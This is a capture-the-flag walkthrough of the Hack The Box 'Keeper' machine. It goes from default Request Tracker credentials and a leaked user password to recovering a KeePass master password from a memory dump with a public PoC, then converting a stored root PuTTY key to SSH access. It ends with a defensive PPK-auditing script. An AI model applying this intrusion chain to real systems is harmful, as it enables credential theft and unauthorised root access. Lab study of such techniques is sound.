# Keeper

## Nmap Scan

```
$ nmap -sC -sV -Pn -oN nmap 10.10.11.227                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 09:14 +08
Nmap scan report for 10.10.11.227
Host is up (0.0067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds
```

## Initial Access

### Port 80

There is a website hosted on port 80. They only tell us to visit this webpage to raise an IT support ticket.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FMERwkE2gs0VGPXyKBGva%2Fimage.png?alt=media&#x26;token=8653b05b-6114-4c70-8f3e-f9b5d7f40f25" alt=""><figcaption></figcaption></figure>

So I added `tickets.keeper.htb` into the host file.

```
$ echo "10.10.11.227 tickets.keeper.htb" | sudo tee -a /etc/hosts 
[sudo] password for ranay: 
10.10.11.227 tickets.keeper.htb

┌──(ranay㉿kali)-[~/Desktop/hackthebox/boxes/keeper]
└─$ cat /etc/hosts
...
10.10.11.227 tickets.keeper.htb
```

After adding it to the hosts file, I visited the website and it showed me this.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FTBbNy7fn5I5YX1TdZhtm%2Fimage.png?alt=media&#x26;token=353d1d2f-e4c3-4015-b759-c94ae206a870" alt=""><figcaption></figcaption></figure>

From the top right I can see that it is a Request Tracker, and since this is a login page, I searched for default credentials in case there were any. After searching, I found that there are default credentials for this software.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FBuoMfcjTk8F3ThxBWtJf%2Fimage.png?alt=media&#x26;token=01c4731b-7d98-4d9d-92de-85d6918afb85" alt=""><figcaption></figcaption></figure>

After trying the default username and password, I am able to log in.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F9rgCaGUn2X8Ela4KjOH9%2Fimage.png?alt=media&#x26;token=5eac8814-6c76-43d0-9687-04ae2de1a3e3" alt=""><figcaption></figcaption></figure>

I will then go to the `User` tab under `Admin` to see if there are any other users.

From here, I can see there is another user called `lnorgaard`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FKFMQg99wFNvxufICei76%2Fimage.png?alt=media&#x26;token=61f8e07b-5f45-4837-ae7d-95e6430f2a89" alt=""><figcaption></figcaption></figure>

If I click into it, we can see that the password for the user `lnorgaard` is `Welcome2023!`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FPdAKwWHwYz9iBDYA268t%2Fimage.png?alt=media&#x26;token=5399dd46-a269-4e3e-afed-c28a8e442643" alt=""><figcaption></figcaption></figure>

After trying the credentials, I am able to log in to the system as `lnorgaard`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fb96dlmrcfJRNTfppQWXI%2Fimage.png?alt=media&#x26;token=fef4dd7c-b0e3-4262-aea3-e3ac1f2e9531" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### KeePass dump

When I check the home directory, I can see that there is an `RT30000.zip` file.

```bash
lnorgaard@keeper:~$ ls
RT30000.zip  user.txt
```

I will then unzip the file to see what it contains.

```bash
lnorgaard@keeper:~$ unzip RT30000.zip 
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp     
 extracting: passcodes.kdbx          
lnorgaard@keeper:~$ ls
KeePassDumpFull.dmp  passcodes.kdbx  RT30000.zip  user.txt
lnorgaard@keeper:~$ 
```

The zip file contains `KeePassDumpFull.dmp` and `passcodes.kdbx`. I will then copy `passcodes.kdbx` over to my machine.

```
$ scp lnorgaard@10.10.11.227:/home/lnorgaard/passcodes.kdbx ./passcodes.kdbx 
lnorgaard@10.10.11.227's password: 
passcodes.kdbx                                100% 3630   312.5KB/s   00:00
```

However, when I tried to crack the password, it did not seem to work.

After searching online to see if there are any uses for the `KeePassDumpFull.dmp` file, I found that we may be able to get the master password from the dump file instead.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FdG16sGY73h7EwBLOSxzv%2Fimage.png?alt=media&#x26;token=c19fef2e-6dd6-4011-b835-4dab504e9678" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/matro7sh/keepass-dump-masterkey>" %}

After moving the dump file into the same folder as the PoC script, I will run the script. However, there are multiple possible passwords.

```
$ python poc.py -d KeePassDumpFull.dmp 
2024-05-27 09:53:34,145 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
```

However, there is a slight issue: this does not make sense. So I copied `●ldgr●d med fl●de` into Google, and this is what I got back.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FX9DYtzrsK9kgyV3A83dZ%2Fimage.png?alt=media&#x26;token=810be62c-ae0d-4b6c-bf1d-62c78ad7fa8e" alt=""><figcaption></figcaption></figure>

So the possible password could be this: `rødgrød med fløde`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FvSJN5YL8aJ9nZ6bwI4ak%2Fimage.png?alt=media&#x26;token=588efe8d-ee02-48a0-9c56-756382beb340" alt=""><figcaption></figcaption></figure>

So I tried entering that as the master password for the KeePass file.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FGwMTXkEyn3PO4rbJYhSl%2Fimage.png?alt=media&#x26;token=ff7a5ecd-3340-4c77-87d0-dfe1f87dc29b" alt=""><figcaption></figcaption></figure>

Sure enough, it works.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FYk1JwxdYcpDaYzf2lXOF%2Fimage.png?alt=media&#x26;token=719bb0c3-8a84-4166-b4c5-c0c9e6a25265" alt=""><figcaption></figcaption></figure>

### PuTTYgen: convert to OpenSSH key

After clicking on `root`, we can see that a private key has been inserted into the notes section.

```
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
...
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
```

{% embed url="<https://www.tbs-certificates.co.uk/FAQ/en/putty-ppk-vers-openssl-openssh.html>" %}

I need to use `puttygen` to convert the PPK into an OpenSSH private key. After that, I am able to log in as root.

```
$ puttygen putty.ppk -O private-openssh -o my.key

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i my.key root@10.10.11.227
The authenticity of host '10.10.11.227 (10.10.11.227)' can't be established.
ED25519 key fingerprint is SHA256:hczMXffNW5M3qOppqsTCzstpLKxrvdBjFYoJXJGpr7w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.227' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41
root@keeper:~# 
```
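As an added example (not part of the original writeup and not PuTTY's own code), the following Python parses the PPK header shown above, decodes the public blob to report the RSA modulus size, and flags what a key-hygiene check would care about: a key stored with `Encryption: none` is a plaintext private key wherever it ends up, a password-manager note included, and a version-2 PPK still uses the older SHA-1 based MAC and key derivation. The sample file is constructed: its header and Public-Lines are the ones shown above, while the private blob, which is omitted from the writeup, is replaced by a placeholder line, so the Private-MAC cannot be verified against it.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: header and Public-Lines are from the PPK shown in the
# writeup; the private blob is omitted there, so a single placeholder line
# stands in for it (not a real key, so the MAC will not match it).
SAMPLE_PPK = """\
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 1
AAAAAA==
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
"""


@dataclass
class PpkInfo:
    version: int
    key_type: str
    encryption: str
    comment: str
    public_blob: bytes
    private_blob: bytes
    mac_hex: str
    rsa_exponent: Optional[int] = None
    rsa_bits: Optional[int] = None


def _read_string(buf: bytes, pos: int) -> Tuple[bytes, int]:
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    if pos + 4 > len(buf):
        raise ValueError("truncated SSH string length")
    n = int.from_bytes(buf[pos:pos + 4], "big")
    pos += 4
    if pos + n > len(buf):
        raise ValueError("truncated SSH string body")
    return buf[pos:pos + n], pos + n


def parse_ppk(text: str) -> PpkInfo:
    """Parse the header lines of a PPK v2/v3 file and decode its two blobs."""
    lines = [ln.rstrip("\r") for ln in text.splitlines()]
    m = re.fullmatch(r"PuTTY-User-Key-File-(\d+): (\S+)", lines[0])
    if not m:
        raise ValueError("not a PuTTY private key file")
    version, key_type = int(m.group(1)), m.group(2)
    headers: Dict[str, str] = {}
    public_blob = private_blob = b""
    i = 1
    while i < len(lines):
        if not lines[i].strip():
            i += 1
            continue
        name, _, value = lines[i].partition(": ")
        i += 1
        if name in ("Public-Lines", "Private-Lines"):
            # The count says how many base64 lines follow; join and decode them.
            count = int(value)
            blob = base64.b64decode("".join(lines[i:i + count]), validate=True)
            i += count
            if name == "Public-Lines":
                public_blob = blob
            else:
                private_blob = blob
        else:
            headers[name] = value
    info = PpkInfo(version, key_type, headers["Encryption"], headers["Comment"],
                   public_blob, private_blob, headers["Private-MAC"])
    if key_type == "ssh-rsa":
        # Public blob is the standard SSH RSA key: string "ssh-rsa", mpint e, mpint n.
        algo, pos = _read_string(public_blob, 0)
        if algo != b"ssh-rsa":
            raise ValueError("public blob does not match declared key type")
        e_bytes, pos = _read_string(public_blob, pos)
        n_bytes, _ = _read_string(public_blob, pos)
        info.rsa_exponent = int.from_bytes(e_bytes, "big")
        info.rsa_bits = int.from_bytes(n_bytes, "big").bit_length()
    return info


def audit_ppk(text: str) -> List[str]:
    """Findings a key-hygiene scan would report for one PPK file."""
    info = parse_ppk(text)
    findings = []
    if info.encryption == "none":
        findings.append("private key is stored unencrypted (Encryption: none)")
    if info.version < 3:
        findings.append("PPK version 2 (SHA-1 MAC/KDF); regenerate as version 3")
    if info.rsa_bits is not None and info.rsa_bits < 2048:
        findings.append(f"RSA modulus is only {info.rsa_bits} bits")
    return findings


if __name__ == "__main__":
    info = parse_ppk(SAMPLE_PPK)
    print(f"{info.key_type} {info.rsa_bits}-bit, e={info.rsa_exponent}, comment={info.comment!r}")
    for finding in audit_ppk(SAMPLE_PPK):
        print("FINDING:", finding)
```

Run against a directory of `.ppk` files, `audit_ppk` gives the same unencrypted-key finding that applies to the key found in the notes here: the `Encryption: none` header means anyone who can read the note can log in with it, which is why `puttygen` needed no passphrase to convert it.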
